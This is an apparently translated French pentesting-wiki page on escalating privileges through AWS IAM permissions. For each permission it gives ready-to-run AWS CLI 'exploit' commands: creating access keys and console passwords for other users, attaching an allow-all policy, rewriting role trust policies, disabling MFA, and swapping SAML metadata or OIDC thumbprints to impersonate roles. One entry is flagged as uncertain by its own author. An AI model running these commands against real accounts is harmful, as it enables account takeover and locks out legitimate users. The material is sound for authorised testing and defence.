AWS - IAM Privesc

IAM

Pour plus d'informations sur IAM, consultez :

iam:CreatePolicyVersion

Accorde la capacité de créer une nouvelle version de politique IAM, contournant le besoin de la permission iam:SetDefaultPolicyVersion en utilisant le flag --set-as-default. Cela permet de définir des permissions personnalisées.

Commande d'exploitation :

aws iam create-policy-version --policy-arn <target_policy_arn> \
--policy-document file:///path/to/administrator/policy.json --set-as-default

Impact : Escalade directement les privilèges en permettant toute action sur n'importe quelle ressource.

iam:SetDefaultPolicyVersion

Permet de changer la version par défaut d'une politique IAM à une autre version existante, ce qui peut potentiellement escalader les privilèges si la nouvelle version a plus de permissions.

Commande Bash :

aws iam set-default-policy-version --policy-arn <target_policy_arn> --version-id v2

Impact: Escalade de privilèges indirecte en activant plus de permissions.

iam:CreateAccessKey

Permet de créer un ID de clé d'accès et une clé d'accès secrète pour un autre utilisateur, ce qui peut entraîner une escalade de privilèges potentielle.

Exploit :

aws iam create-access-key --user-name <target_user>

Impact: Escalade de privilèges directe en assumant les permissions étendues d'un autre utilisateur.

iam:CreateLoginProfile | iam:UpdateLoginProfile

Permet de créer ou de mettre à jour un profil de connexion, y compris la définition de mots de passe pour la connexion à la console AWS, conduisant à une escalade de privilèges directe.

Exploitation pour la création :

aws iam create-login-profile --user-name target_user --no-password-reset-required \
--password '<password>'

Exploit for Update:

aws iam update-login-profile --user-name target_user --no-password-reset-required \
--password '<password>'

Impact : Escalade de privilèges directe en se connectant en tant que "n'importe quel" utilisateur.

iam:UpdateAccessKey

Permet d'activer une clé d'accès désactivée, ce qui peut entraîner un accès non autorisé si l'attaquant possède la clé désactivée.

Exploitation :

aws iam update-access-key --access-key-id <ACCESS_KEY_ID> --status Active --user-name <username>

Impact : Escalade de privilèges directe en réactivant des clés d'accès.

iam:CreateServiceSpecificCredential | iam:ResetServiceSpecificCredential

Permet de générer ou de réinitialiser des identifiants pour des services AWS spécifiques (par exemple, CodeCommit, Amazon Keyspaces), héritant des permissions de l'utilisateur associé.

Exploitation pour la création :

aws iam create-service-specific-credential --user-name <username> --service-name <service>

Exploitation pour Réinitialisation :

aws iam reset-service-specific-credential --service-specific-credential-id <credential_id>

Impact : Escalade de privilèges directe au sein des permissions du service de l'utilisateur.

iam:AttachUserPolicy || iam:AttachGroupPolicy

Permet d'attacher des politiques aux utilisateurs ou aux groupes, escaladant directement les privilèges en héritant des permissions de la politique attachée.

Exploit pour l'utilisateur :

aws iam attach-user-policy --user-name <username> --policy-arn "<policy_arn>"

Exploit for Group:

Exploit pour le groupe :

aws iam attach-group-policy --group-name <group_name> --policy-arn "<policy_arn>"

Impact : Escalade de privilèges directe à tout ce que la politique accorde.

iam:AttachRolePolicy, ( sts:AssumeRole|iam:createrole) | iam:PutUserPolicy | iam:PutGroupPolicy | iam:PutRolePolicy

Permet d'attacher ou de mettre des politiques aux rôles, utilisateurs ou groupes, permettant une escalade de privilèges directe en accordant des permissions supplémentaires.

Exploit pour Role :

bashCopy codeaws iam attach-role-policy --role-name <role_name> --policy-arn "<policy_arn>"

Exploitation des Politiques Inline :

aws iam put-user-policy --user-name <username> --policy-name "<policy_name>" \
--policy-document "file:///path/to/policy.json"

aws iam put-group-policy --group-name <group_name> --policy-name "<policy_name>" \
--policy-document file:///path/to/policy.json

aws iam put-role-policy --role-name <role_name> --policy-name "<policy_name>" \
--policy-document file:///path/to/policy.json

Vous pouvez utiliser une politique comme :

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": [
"*"
]
}
]
}

Impact : Escalade de privilèges directe en ajoutant des permissions via des politiques.

iam:AddUserToGroup

Permet de s'ajouter à un groupe IAM, escaladant les privilèges en héritant des permissions du groupe.

Exploitation :

aws iam add-user-to-group --group-name <group_name> --user-name <username>

Impact : Escalade de privilèges directe au niveau des permissions du groupe.

iam:UpdateAssumeRolePolicy

Permet de modifier le document de politique d'approbation d'un rôle, permettant l'assomption du rôle et de ses permissions associées.

Exploit :

aws iam update-assume-role-policy --role-name <role_name> \
--policy-document file:///path/to/assume/role/policy.json

Où la politique ressemble à ce qui suit, ce qui donne à l'utilisateur la permission d'assumer le rôle :

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "sts:AssumeRole",
"Principal": {
"AWS": "$USER_ARN"
}
}
]
}

Impact : Escalade de privilèges directe en assumant les permissions de n'importe quel rôle.

iam:UploadSSHPublicKey || iam:DeactivateMFADevice

Permet de télécharger une clé publique SSH pour s'authentifier à CodeCommit et de désactiver les dispositifs MFA, ce qui peut entraîner une escalade de privilèges indirecte.

Exploitation pour le téléchargement de clé SSH :

aws iam upload-ssh-public-key --user-name <username> --ssh-public-key-body <key_body>

Exploitation pour la désactivation de MFA :

aws iam deactivate-mfa-device --user-name <username> --serial-number <serial_number>

Impact: Escalade de privilèges indirecte en activant l'accès à CodeCommit ou en désactivant la protection MFA.

iam:ResyncMFADevice

Permet la resynchronisation d'un appareil MFA, pouvant potentiellement mener à une escalade de privilèges indirecte en manipulant la protection MFA.

Commande Bash :

aws iam resync-mfa-device --user-name <username> --serial-number <serial_number> \
--authentication-code1 <code1> --authentication-code2 <code2>

Impact : Escalade de privilèges indirecte en ajoutant ou manipulant des dispositifs MFA.

iam:UpdateSAMLProvider, iam:ListSAMLProviders, (iam:GetSAMLProvider)

Avec ces permissions, vous pouvez changer les métadonnées XML de la connexion SAML. Ensuite, vous pourriez abuser de la fédération SAML pour vous connecter avec n'importe quel rôle qui lui fait confiance.

Notez qu'en faisant cela, les utilisateurs légitimes ne pourront pas se connecter. Cependant, vous pourriez obtenir le XML, mettre le vôtre, vous connecter et reconfigurer l'ancien.

# List SAMLs
aws iam list-saml-providers

# Optional: Get SAML provider XML
aws iam get-saml-provider --saml-provider-arn <ARN>

# Update SAML provider
aws iam update-saml-provider --saml-metadata-document <value> --saml-provider-arn <arn>

## Login impersonating roles that trust the SAML provider

# Optional: Set the previous XML back
aws iam update-saml-provider --saml-metadata-document <previous-xml> --saml-provider-arn <arn>

iam:UpdateOpenIDConnectProviderThumbprint, iam:ListOpenIDConnectProviders, (iam:GetOpenIDConnectProvider)

(Pas sûr de cela) Si un attaquant dispose de ces permissions, il pourrait ajouter une nouvelle empreinte digitale pour réussir à se connecter à tous les rôles faisant confiance au fournisseur.

# List providers
aws iam list-open-id-connect-providers
# Optional: Get Thumbprints used to not delete them
aws iam get-open-id-connect-provider --open-id-connect-provider-arn <ARN>
# Update Thumbprints (The thumbprint is always a 40-character string)
aws iam update-open-id-connect-provider-thumbprint --open-id-connect-provider-arn <ARN> --thumbprint-list 359755EXAMPLEabc3060bce3EXAMPLEec4542a3

Références

• https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/